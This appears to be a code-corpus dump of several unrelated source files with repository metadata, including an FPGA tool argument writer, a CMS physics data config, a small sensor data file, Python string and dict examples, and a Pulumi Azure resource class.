if (self._device is None): raise DiamondException("Argument 'Device' (-d) is not set.")
buffer += "-d {0}\n".format(self._device)
if (self._speedGrade is None): raise DiamondException("Argument 'SpeedGrade' (-s) is not set.")
buffer += "-s {0}\n".format(self._speedGrade)
if (self._package is None): raise DiamondException("Argument 'Package' (-t) is not set.")
buffer += "-t {0}\n".format(self._package)
if (self._topLevel is None): raise DiamondException("Argument 'TopLevel' (-top) is not set.")
buffer += "-top {0}\n".format(self._topLevel)
if (self._vhdlVersion is VHDLVersion.VHDL2008):
buffer += "-vh2008\n"
if (self.Logfile is not None):
buffer += "-logfile {0}\n".format(self.Logfile)
for keyValuePair in self._hdlParams.items():
buffer += "-hdl_param {0} {1}\n".format(*keyValuePair)
for file in project.Files(fileType=FileTypes.VHDLSourceFile):
buffer += "-lib {library}\n-vhd {file}\n".format(file=file.Path.as_posix(), library=file.LibraryName)
with self._file.open('w') as fileHandle:
fileHandle.write(buffer)
def MapFilter(gen):
for line in gen:
yield LogEntry(line, Severity.Normal)
def CompilerFilter(gen):
for line in gen:
if line.startswith("ERROR "):
yield LogEntry(line, Severity.Error)
elif line.startswith("WARNING "):
yield LogEntry(line, Severity.Warning)
elif line.startswith("INFO "):
yield LogEntry(line, Severity.Info)
else:
yield LogEntry(line, Severity.Normal)
|
[
"[email protected]"
] | |
87359040a44cb331edcde6eadc795cc5893b7acf
|
81539aba88c22cf75bd2e14f5e0e92f2bf54e962
|
/DarkMatterMap2017/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV_madgraph_mcatnlo_pythia8/TTbarDMJets_Inclusive_scalar_LO_Mchi-1_Mphi-50_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV_madgraph_mcatnlo_pythia8_230000_9_cff.py
|
e6759e810046c4bd042df921f1964599a39baf13
|
[] |
no_license
|
nistefan/RandomizedParametersSeparator
|
ad35b48b95e9745814c0bf9d8d8b6eb8aa479177
|
66a0e291b59113c6b5301768f1c10e36cf23d3c3
|
refs/heads/master
| 2021-01-03T00:41:17.415005 | 2020-02-19T13:30:54 | 2020-02-19T13:30:54 | 239,838,928 | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 10,331 |
py
|
import FWCore.ParameterSet.Config as cms
maxEvents = cms.untracked.PSet( input = cms.untracked.int32(-1) )
readFiles = cms.untracked.vstring()
source = cms.Source ("PoolSource",fileNames = readFiles, lumisToProcess = cms.untracked.VLuminosityBlockRange(*('1:21184', '1:20120', '1:21020', '1:21278', '1:21582', '1:22183', '1:20507', '1:20669', '1:21156', '1:21312', '1:21392', '1:85835', '1:85963', '1:85997', '1:24550', '1:27052', '1:49576', '1:56170', '1:60155', '1:75247', '1:76110', '1:69385', '1:69761', '1:69993', '1:54880', '1:57691', '1:62191', '1:62227', '1:62531', '1:62663', '1:62801', '1:55051', '1:55568', '1:67417', '1:67649', '1:67914', '1:55269', '1:67492', '1:67564', '1:98553', '1:98286', '1:98417', '1:98667', '1:49015', '1:54106', '1:56364', '1:59905', '1:61367', '1:61451', '1:61468', '1:61505', '1:61506', '1:49894', '1:50707', '1:51881', '1:52422', '1:57246', '1:61058', '1:78464', '1:78854', '1:57044', '1:62431', '1:63407', '1:76632', '1:68848', '1:72285', '1:74745', '1:75643', '1:77807', '1:75844', '1:78096', '1:80030', '1:81613', '1:81707', '1:95607', '1:95648', '1:97195', '1:97668', '1:99124', '1:99174', '1:99220', '1:96854', '1:98898', '1:101504', '1:97204', '1:97277', '1:97585', '1:98536', '1:98761', '1:99068', '1:99295', '1:99457', '1:99711', '1:100294', '1:101094', '1:101679', '1:100621', '1:23165', '1:27251', '1:24512', '1:28044', '1:28436', '1:31627', '1:34004', '1:34016', '1:35517', '1:35533', '1:35727', '1:35206', '1:35491', '1:36151', '1:36365', '1:39156', '1:39584', '1:39653', '1:39797', '1:46146', '1:39436', '1:55233', '1:55854', '1:62436', '1:64121', '1:64860', '1:67476', '1:67873', '1:68332', '1:69237', '1:55558', '1:55832', '1:55863', '1:64318', '1:64795', '1:67004', '1:67771', '1:68662', '1:68676', '1:69057', '1:56323', '1:63488', '1:50387', '1:54967', '1:54976', '1:59659', '1:59983', '1:60644', '1:61694', '1:63105', '1:63255', '1:63418', '1:59286', '1:60858', '1:61283', '1:61887', '1:63402', '1:16385', '1:16603', '1:17835', '1:18341', '1:18818', '1:22765', '1:22959', '1:6813', '1:6852', '1:7528', '1:8680', '1:9199', '1:9508', '1:9748', '1:10213', '1:14580', '1:14829', '1:15121', '1:13320', '1:24763', '1:27477', '1:30006', '1:30109', '1:37012', '1:39238', '1:39295', '1:40391', '1:40865', '1:46504', '1:46610', '1:46645', '1:46793', '1:28189', '1:30612', '1:35933', '1:39839', '1:39894', '1:46035', '1:46392', '1:49861', '1:51430', '1:51463', '1:23868', '1:57018', '1:59208', '1:59762', '1:23400', '1:30332', '1:30753', '1:50758', '1:51529', '1:53025', '1:57045', '1:58145', '1:28443', '1:31856', '1:32484', '1:34368', '1:34437', '1:34536', '1:35112', '1:35264', '1:23347', '1:27136', '1:28005', '1:28199', '1:28224', '1:28288', '1:28385', '1:28504', '1:28622', '1:28758', '1:59112', '1:59232', '1:59236', '1:59565', '1:59585', '1:59940', '1:60360', '1:60397', '1:60613', '1:60675', '1:60934', '1:60992', '1:61068', '1:61109', '1:63375', '1:80899', '1:72212', '1:72782', '1:70147', '1:70695', '1:71205', '1:71244', '1:72197', '1:72249', '1:74777', '1:55594', '1:55614', '1:55622', '1:55631', '1:55677', '1:55707', '1:55749', '1:55767', '1:55775', '1:55781', '1:55784', '1:77296', '1:77602', '1:77640', '1:74157', '1:74158', '1:74194', '1:74237', '1:74282', '1:74287', '1:74328', '1:74351', '1:74380', '1:74405', '1:74407', '1:74422', '1:74439', '1:74453', '1:74418', '1:74444', '1:74450', '1:74499', '1:74536', '1:74560', '1:74569', '1:74596', '1:75788', '1:95454', '1:95472', '1:95696', '1:95603', '1:95639', '1:95652', '1:95654', '1:95666', '1:95694', '1:95814', '1:95815', '1:95834', '1:95896', '1:95900', '1:97330', '1:97543', '1:97557', '1:97568', '1:97606', '1:97607', '1:97613', '1:97664', '1:61160', '1:60670', '1:60754', '1:60763', '1:60784', '1:60859', '1:60867', '1:61265', '1:61355', '1:61384', '1:61499', '1:61572', '1:75277', '1:75328', '1:62455', '1:62954', '1:63854', '1:64050', '1:64116', '1:64178', '1:64197', '1:64220', '1:64245', '1:64252', '1:64255', '1:64331', '1:64358', '1:67205', '1:67213', '1:67271', '1:67354', '1:67367', '1:67381', '1:71762', '1:71819', '1:72192', '1:72202', '1:72318', '1:72333', '1:72334', '1:73243', '1:73252', '1:73274', '1:73316', '1:73317', '1:73338', '1:74248', '1:96893', '1:98397', '1:99165', '1:99809', '1:100790', '1:96932', '1:99503', '1:101946', '1:20496', '1:33758', '1:36960', '1:25057', '1:32922', '1:33619', '1:36626', '1:38508', '1:59819', '1:96346', '1:96483', '1:102082', '1:102219', '1:102259', '1:102501', '1:96750', '1:98471', '1:98606', '1:99283', '1:99340', '1:99578', '1:99734', '1:100120', '1:100201', '1:100328', '1:101624', '1:101986', '1:80622', '1:81515', '1:86754', '1:89637', '1:91321', '1:87255', '1:90124', '1:95550', '1:97900', '1:88926', '1:89400', '1:91483', '1:79838', '1:86503', '1:95699', '1:763', '1:23253', '1:23448', '1:23455', '1:23472', '1:23889', '1:24435', '1:27092', '1:30299', '1:30364', '1:30397', '1:30899', '1:30931', '1:16401', '1:49802', '1:49864', '1:49904', '1:49916', '1:49934', '1:51013', '1:49793', '1:49821', '1:49829', '1:49837', '1:49884', '1:49907', '1:49956', '1:49961', '1:49978', '1:50080', '1:50100', '1:50107', '1:50167', '1:62576', '1:62676', '1:62726', '1:62471', '1:62657', '1:62668', '1:62740', '1:80869', '1:80985', '1:85057', '1:85170', '1:85228', '1:85239', '1:85333', '1:85361', '1:85294', '1:85330', '1:85332', '1:85334', '1:85464', '1:85489', '1:85499', '1:85636', '1:85557', '1:85561', '1:85881', '1:85914', '1:85922', '1:85988', '1:86065', '1:86103', '1:86120', '1:86154', '1:86179', '1:86259', '1:86306', '1:86349', '1:27773', '1:27837', '1:27934', '1:27935', '1:27975', '1:28024', '1:28058', '1:28065', '1:30112', '1:30115', '1:39648', '1:39726', '1:39857', '1:39865', '1:40350', '1:40432', '1:40497', '1:40796', '1:40826', '1:80920', '1:72753', '1:73489', '1:91891', '1:64550', '1:67895', '1:67938', '1:73101', '1:73113', '1:73118', '1:73147', '1:73161', '1:73237', '1:73244', '1:73280', '1:94733', '1:95759', '1:74979', '1:75383', '1:75972', '1:76349', '1:76377', '1:76382', '1:76401', '1:76544', '1:76841', '1:76846', '1:76472', '1:76549', '1:76562', '1:86564', '1:79693', '1:85471', '1:86438', '1:70568', '1:79207', '1:89442', '1:73309', '1:74032', '1:74329', '1:74332', '1:74340', '1:74816', '1:74967', '1:75774', '1:78030', '1:78140', '1:78320', '1:78358', '1:78360', '1:78378', '1:78388', '1:77569', '1:77726', '1:77740', '1:77829', '1:77849', '1:77960', '1:79155', '1:79165', '1:79187', '1:79196', '1:79220', '1:79301', '1:79309', '1:79324', '1:79349', '1:79374', '1:79400', '1:79448', '1:79462', '1:79512', '1:79520', '1:79521', '1:79567', '1:79618', '1:79630', '1:79650', '1:79491', '1:79501', '1:80117', '1:90625', '1:97803', '1:98322', '1:75149', '1:75254', '1:76631', '1:76688', '1:76706', '1:76648', '1:86572', '1:77544', '1:77675', '1:77692', '1:77779', '1:77921', '1:78503', '1:78505', '1:78524', '1:78554', '1:78661', '1:78668', '1:78696', '1:78842', '1:78962', '1:79237', '1:88129', '1:88622', '1:88636', '1:88640', '1:90113', '1:90118', '1:86140', '1:86446', '1:86495', '1:86496', '1:86515', '1:86578', '1:86599', '1:86644', '1:86679', '1:86731', '1:86690', '1:86691', '1:86709', '1:86747', '1:86816', '1:86825', '1:86865', '1:86936', '1:87230', '1:2557', '1:2681', '1:2804', '1:2664', '1:2793', '1:2940', '1:2992', '1:3008', '1:3052', '1:3211', '1:3227', '1:2907', '1:2964', '1:5766', '1:5769', '1:5842', '1:5897', '1:5910', '1:16373', '1:16399', '1:16432', '1:16480', '1:16487', '1:16534', '1:16585', '1:16656', '1:16746', '1:16772', '1:16843', '1:16845', '1:49339', '1:50015', '1:50348', '1:50468', '1:50671', '1:50793', '1:50979', '1:51918', '1:52026', '1:19115', '1:19658', '1:19744', '1:20683', '1:21026', '1:21058', '1:18294', '1:18488', '1:18507', '1:20157', '1:20164', '1:20222', '1:20245', '1:61991', '1:52479', '1:53377', '1:53427', '1:54001', '1:54010', '1:54022', '1:54029', '1:54034', '1:54060', '1:54091', '1:53443', '1:53945', '1:54033', '1:101436', '1:52953', '1:53307', '1:52915', '1:52986', '1:53121', '1:53339', '1:53479', '1:53489', '1:53575', '1:53587', '1:53594', '1:53603', '1:53699', '1:56476', '1:56877', '1:71689', '1:67104', '1:67111', '1:67129', '1:67141', '1:67161', '1:67163', '1:67179', '1:67197', '1:68273', '1:68298', '1:69151', ))
)
readFiles.extend( ['/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/183425A0-2CF9-E911-8A59-0CC47AC17502.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/14013B83-ED0C-EA11-A969-0CC47A4C8E16.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/D8BE5B85-CD00-EA11-8D89-008CFA197DDC.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/8EA49950-280B-EA11-8D88-0CC47A7C353E.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/C80BC002-AE01-EA11-8935-509A4C9EF929.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/94EED3C0-3913-EA11-9D36-003048F1C4AC.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/0CC49EA7-DAFA-E911-B4D9-549F3525C318.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/7ED89422-6000-EA11-91BA-509A4C9EF8FF.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/02A19D30-BF01-EA11-8C20-0CC47AF973C2.root', '/store/mc/RunIIFall17MiniAODv2/TTbarDMJets_Inclusive_scalar_LO_TuneCP5_13TeV-madgraph-mcatnlo-pythia8/MINIAODSIM/PU2017_12Apr2018_rp_94X_mc2017_realistic_v14-v1/230000/986C80F8-D001-EA11-B39E-509A4C9F8A64.root']);
|
[
"[email protected]"
] | |
fa65834f183d396f167ddac7d0e3ce217989aeac
|
c065ff2a6a377aea2303b7b8482558049958a7ec
|
/bleach/1561633873/tactile.tac
|
e0b7984bc288e6bd96fb1113990c5d9650654c86
|
[] |
no_license
|
waedbara/vision2tactile
|
7bc9861eecb4247fd254ea58dc508ed18a03b1af
|
edbc9dfee61b4a4b1f0caebb2f16faef090dff32
|
refs/heads/master
| 2022-04-02T20:43:16.621687 | 2019-12-11T08:07:39 | 2019-12-11T08:07:39 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 290 |
tac
|
,3560,3702,3650,3700,3474,3660,3767,3585,3608,3572,3530,3696,3584,3484,3133,3588,3544,3511,3061,2934,3702,3669,3631,3415,2036,2049,1890,2201,2639,2797,3024,2834,3104,3280,3113,3424,3332,3262,2930,3190,3410,3204,3299,3286,3229,3313,3287,2842,2696,3348,3301,3393,3300,2041,2050,2853,2054,2473
|
[
"[email protected]"
] | |
95c9ef6893aed8f628771d2758083ee20acee4bc
|
9795fe1532849a046895cfb0d4b359144ad575dd
|
/stringtest.py
|
a2836ef585b1b18b6d2681aa68771ee248598116
|
[
"MIT"
] |
permissive
|
DBeath/python-snippets
|
36e2df94d20227b897dd8c9345f9f0dfd733f96b
|
c9642c37183d947eb8a1a781e47bd70b1306d5ca
|
refs/heads/master
| 2023-03-25T14:26:59.556635 | 2019-10-19T07:26:31 | 2019-10-19T07:26:31 | 118,523,453 | 0 | 0 |
MIT
| 2021-03-22T16:58:22 | 2018-01-22T22:22:16 |
HTML
|
UTF-8
|
Python
| false | false | 237 |
py
|
string = ''
print(string is None)
print(not string)
print(string is '')
print(string is not '')
if string:
print('String is true')
else:
print('String is false')
print()
string = 'Test'
print(string is None)
print(not string)
|
[
"[email protected]"
] | |
7f9e5d09226cfa9f68d090ddab27a9197d586658
|
d7ec67a5ba315103fa6a6bae6dc045f1fecf7add
|
/normal/FluentPython_code_master/ch03_dict_set/strkeydict0.py
|
a2dc7df2040e476b3431f97d2ab8bc19527f2a50
|
[] |
no_license
|
munezou/PycharmProject
|
cc62f5e4278ced387233a50647e8197e009cc7b4
|
26126c02cfa0dc4c0db726f2f2cabb162511a5b5
|
refs/heads/master
| 2023-03-07T23:44:29.106624 | 2023-01-23T16:16:08 | 2023-01-23T16:16:08 | 218,804,126 | 2 | 1 | null | 2023-02-28T23:58:22 | 2019-10-31T15:57:22 |
Jupyter Notebook
|
UTF-8
|
Python
| false | false | 1,702 |
py
|
'''
StrKeyDict0 converts non-string keys to `str` on lookup
# BEGIN STRKEYDICT0_TESTS
Tests for item retrieval using `d[key]` notation::
>>> d = StrKeyDict0([('2', 'two'), ('4', 'four')])
>>> d['2']
'two'
>>> d[4]
'four'
>>> d[1]
Traceback (most recent call last):
...
KeyError: '1'
Tests for item retrieval using `d.get(key)` notation::
>>> d.get('2')
'two'
>>> d.get(4)
'four'
>>> d.get(1, 'N/A')
'N/A'
Tests for the `in` operator::
>>> 2 in d
True
>>> 1 in d
False
# END STRKEYDICT0_TESTS
'''
# BEGIN STRKEYDICT0
class StrKeyDict0(dict): # <1>
def __missing__(self, key):
if isinstance(key, str): # <2>
raise KeyError(key)
return self[str(key)] # <3>
def get(self, key, default=None):
try:
return self[key] # <4>
except KeyError:
return default # <5>
def __contains__(self, key):
return key in self.keys() or str(key) in self.keys() # <6>
# END STRKEYDICT0
print('---< start main routine >---')
d = StrKeyDict0([('2', 'two'), ('4', 'four')])
print ('d[2] = {0}'.format(d['2']))
print ('d[4] = {0}'.format(d[4]))
'''
------------------------------------------
if index does not exist, occure error
------------------------------------------
'''
try:
print('d[1] = {0}'.format(d[1]))
except Exception as e:
print(e)
pass
finally:
pass
print()
print ('d.get("2") = {0}'.format(d.get('2')))
print ('d.get(4) = {0}'.format(d.get(4)))
'''
---------------------------------------------
--------------------------------------------
'''
print ('d.get(1, "N/A") = {0}'.format(d.get(1, 'N/A')))
print()
|
[
"[email protected]"
] | |
0b5031a6f7f5e225e262e284fca108ae29536ca9
|
5e6d8b9989247801718dd1f10009f0f7f54c1eb4
|
/sdk/python/pulumi_azure_native/datashare/v20210801/kusto_table_data_set_mapping.py
|
028a2441771fb8ea919a45fda0cdd0950bdf8444
|
[
"BSD-3-Clause",
"Apache-2.0"
] |
permissive
|
vivimouret29/pulumi-azure-native
|
d238a8f91688c9bf09d745a7280b9bf2dd6d44e0
|
1cbd988bcb2aa75a83e220cb5abeb805d6484fce
|
refs/heads/master
| 2023-08-26T05:50:40.560691 | 2021-10-21T09:25:07 | 2021-10-21T09:25:07 | null | 0 | 0 | null | null | null | null |
UTF-8
|
Python
| false | false | 14,828 |
py
|
# coding=utf-8
# *** WARNING: this file was generated by the Pulumi SDK Generator. ***
# *** Do not edit by hand unless you're certain you know what you are doing! ***
import warnings
import pulumi
import pulumi.runtime
from typing import Any, Mapping, Optional, Sequence, Union, overload
from ... import _utilities
from . import outputs
__all__ = ['KustoTableDataSetMappingArgs', 'KustoTableDataSetMapping']
@pulumi.input_type
class KustoTableDataSetMappingArgs:
def __init__(__self__, *,
account_name: pulumi.Input[str],
data_set_id: pulumi.Input[str],
kind: pulumi.Input[str],
kusto_cluster_resource_id: pulumi.Input[str],
resource_group_name: pulumi.Input[str],
share_subscription_name: pulumi.Input[str],
data_set_mapping_name: Optional[pulumi.Input[str]] = None):
"""
The set of arguments for constructing a KustoTableDataSetMapping resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[str] data_set_id: The id of the source data set.
:param pulumi.Input[str] kind: Kind of data set mapping.
Expected value is 'KustoTable'.
:param pulumi.Input[str] kusto_cluster_resource_id: Resource id of the sink kusto cluster.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
"""
pulumi.set(__self__, "account_name", account_name)
pulumi.set(__self__, "data_set_id", data_set_id)
pulumi.set(__self__, "kind", 'KustoTable')
pulumi.set(__self__, "kusto_cluster_resource_id", kusto_cluster_resource_id)
pulumi.set(__self__, "resource_group_name", resource_group_name)
pulumi.set(__self__, "share_subscription_name", share_subscription_name)
if data_set_mapping_name is not None:
pulumi.set(__self__, "data_set_mapping_name", data_set_mapping_name)
@property
@pulumi.getter(name="accountName")
def account_name(self) -> pulumi.Input[str]:
"""
The name of the share account.
"""
return pulumi.get(self, "account_name")
@account_name.setter
def account_name(self, value: pulumi.Input[str]):
pulumi.set(self, "account_name", value)
@property
@pulumi.getter(name="dataSetId")
def data_set_id(self) -> pulumi.Input[str]:
"""
The id of the source data set.
"""
return pulumi.get(self, "data_set_id")
@data_set_id.setter
def data_set_id(self, value: pulumi.Input[str]):
pulumi.set(self, "data_set_id", value)
@property
@pulumi.getter
def kind(self) -> pulumi.Input[str]:
"""
Kind of data set mapping.
Expected value is 'KustoTable'.
"""
return pulumi.get(self, "kind")
@kind.setter
def kind(self, value: pulumi.Input[str]):
pulumi.set(self, "kind", value)
@property
@pulumi.getter(name="kustoClusterResourceId")
def kusto_cluster_resource_id(self) -> pulumi.Input[str]:
"""
Resource id of the sink kusto cluster.
"""
return pulumi.get(self, "kusto_cluster_resource_id")
@kusto_cluster_resource_id.setter
def kusto_cluster_resource_id(self, value: pulumi.Input[str]):
pulumi.set(self, "kusto_cluster_resource_id", value)
@property
@pulumi.getter(name="resourceGroupName")
def resource_group_name(self) -> pulumi.Input[str]:
"""
The resource group name.
"""
return pulumi.get(self, "resource_group_name")
@resource_group_name.setter
def resource_group_name(self, value: pulumi.Input[str]):
pulumi.set(self, "resource_group_name", value)
@property
@pulumi.getter(name="shareSubscriptionName")
def share_subscription_name(self) -> pulumi.Input[str]:
"""
The name of the share subscription which will hold the data set sink.
"""
return pulumi.get(self, "share_subscription_name")
@share_subscription_name.setter
def share_subscription_name(self, value: pulumi.Input[str]):
pulumi.set(self, "share_subscription_name", value)
@property
@pulumi.getter(name="dataSetMappingName")
def data_set_mapping_name(self) -> Optional[pulumi.Input[str]]:
"""
The name of the data set mapping to be created.
"""
return pulumi.get(self, "data_set_mapping_name")
@data_set_mapping_name.setter
def data_set_mapping_name(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "data_set_mapping_name", value)
class KustoTableDataSetMapping(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_id: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
kusto_cluster_resource_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
A Kusto database data set mapping
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] account_name: The name of the share account.
:param pulumi.Input[str] data_set_id: The id of the source data set.
:param pulumi.Input[str] data_set_mapping_name: The name of the data set mapping to be created.
:param pulumi.Input[str] kind: Kind of data set mapping.
Expected value is 'KustoTable'.
:param pulumi.Input[str] kusto_cluster_resource_id: Resource id of the sink kusto cluster.
:param pulumi.Input[str] resource_group_name: The resource group name.
:param pulumi.Input[str] share_subscription_name: The name of the share subscription which will hold the data set sink.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: KustoTableDataSetMappingArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
A Kusto database data set mapping
:param str resource_name: The name of the resource.
:param KustoTableDataSetMappingArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(KustoTableDataSetMappingArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
account_name: Optional[pulumi.Input[str]] = None,
data_set_id: Optional[pulumi.Input[str]] = None,
data_set_mapping_name: Optional[pulumi.Input[str]] = None,
kind: Optional[pulumi.Input[str]] = None,
kusto_cluster_resource_id: Optional[pulumi.Input[str]] = None,
resource_group_name: Optional[pulumi.Input[str]] = None,
share_subscription_name: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = KustoTableDataSetMappingArgs.__new__(KustoTableDataSetMappingArgs)
if account_name is None and not opts.urn:
raise TypeError("Missing required property 'account_name'")
__props__.__dict__["account_name"] = account_name
if data_set_id is None and not opts.urn:
raise TypeError("Missing required property 'data_set_id'")
__props__.__dict__["data_set_id"] = data_set_id
__props__.__dict__["data_set_mapping_name"] = data_set_mapping_name
if kind is None and not opts.urn:
raise TypeError("Missing required property 'kind'")
__props__.__dict__["kind"] = 'KustoTable'
if kusto_cluster_resource_id is None and not opts.urn:
raise TypeError("Missing required property 'kusto_cluster_resource_id'")
__props__.__dict__["kusto_cluster_resource_id"] = kusto_cluster_resource_id
if resource_group_name is None and not opts.urn:
raise TypeError("Missing required property 'resource_group_name'")
__props__.__dict__["resource_group_name"] = resource_group_name
if share_subscription_name is None and not opts.urn:
raise TypeError("Missing required property 'share_subscription_name'")
__props__.__dict__["share_subscription_name"] = share_subscription_name
__props__.__dict__["data_set_mapping_status"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
alias_opts = pulumi.ResourceOptions(aliases=[pulumi.Alias(type_="azure-nextgen:datashare/v20210801:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20181101preview:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20181101preview:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20191101:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20191101:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20200901:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20200901:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-native:datashare/v20201001preview:KustoTableDataSetMapping"), pulumi.Alias(type_="azure-nextgen:datashare/v20201001preview:KustoTableDataSetMapping")])
opts = pulumi.ResourceOptions.merge(opts, alias_opts)
super(KustoTableDataSetMapping, __self__).__init__(
'azure-native:datashare/v20210801:KustoTableDataSetMapping',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None) -> 'KustoTableDataSetMapping':
"""
Get an existing KustoTableDataSetMapping resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = KustoTableDataSetMappingArgs.__new__(KustoTableDataSetMappingArgs)
__props__.__dict__["data_set_id"] = None
__props__.__dict__["data_set_mapping_status"] = None
__props__.__dict__["kind"] = None
__props__.__dict__["kusto_cluster_resource_id"] = None
__props__.__dict__["location"] = None
__props__.__dict__["name"] = None
__props__.__dict__["provisioning_state"] = None
__props__.__dict__["system_data"] = None
__props__.__dict__["type"] = None
return KustoTableDataSetMapping(resource_name, opts=opts, __props__=__props__)
@property
@pulumi.getter(name="dataSetId")
def data_set_id(self) -> pulumi.Output[str]:
"""
The id of the source data set.
"""
return pulumi.get(self, "data_set_id")
@property
@pulumi.getter(name="dataSetMappingStatus")
def data_set_mapping_status(self) -> pulumi.Output[str]:
"""
Gets the status of the data set mapping.
"""
return pulumi.get(self, "data_set_mapping_status")
@property
@pulumi.getter
def kind(self) -> pulumi.Output[str]:
"""
Kind of data set mapping.
Expected value is 'KustoTable'.
"""
return pulumi.get(self, "kind")
@property
@pulumi.getter(name="kustoClusterResourceId")
def kusto_cluster_resource_id(self) -> pulumi.Output[str]:
"""
Resource id of the sink kusto cluster.
"""
return pulumi.get(self, "kusto_cluster_resource_id")
@property
@pulumi.getter
def location(self) -> pulumi.Output[str]:
"""
Location of the sink kusto cluster.
"""
return pulumi.get(self, "location")
@property
@pulumi.getter
def name(self) -> pulumi.Output[str]:
"""
Name of the azure resource
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> pulumi.Output[str]:
"""
Provisioning state of the data set mapping.
"""
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter(name="systemData")
def system_data(self) -> pulumi.Output['outputs.SystemDataResponse']:
"""
System Data of the Azure resource.
"""
return pulumi.get(self, "system_data")
@property
@pulumi.getter
def type(self) -> pulumi.Output[str]:
"""
Type of the azure resource
"""
return pulumi.get(self, "type")
|
[
"[email protected]"
] | |
e5ea4bf5ff824ea3b88eae215aa89ad3e1b1ff1d
|
22b348a0d10519cb1f1da5e886fdf2d3c167cf5a
|
/myweb/test/gevent_/gevent_server.py
|
